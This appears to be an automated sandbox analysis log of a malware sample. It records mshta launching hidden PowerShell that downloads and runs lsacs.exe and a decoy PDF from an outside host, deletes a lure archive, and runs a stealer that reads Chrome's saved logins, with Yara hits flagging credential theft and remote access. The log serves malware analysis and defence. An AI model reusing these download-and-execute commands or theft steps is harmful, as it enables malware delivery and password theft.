Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\lsacs.exe C:\programdata\lsacs.exe
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ecb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cbc.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cfb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ofb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ctr.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_strxor.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_BLAKE2s.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA1.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA256.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_MD5.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Protocol\_scrypt.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_cpuid_c.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_portable.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_clmul.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ocb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\Desktop\Loginvault.db VolumeInformation
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42B5200 cpuid 18_2_00007FF6A42B5200
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBB48 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 18_2_00007FF6A42BBB48

Stealing of Sensitive Information

Source: Yara match File source: 18.2.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\lsacs.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data

Remote Access Functionality

Source: Yara match File source: 18.2.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.lsacs.exe.7ff6a42b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\lsacs.exe, type: DROPPED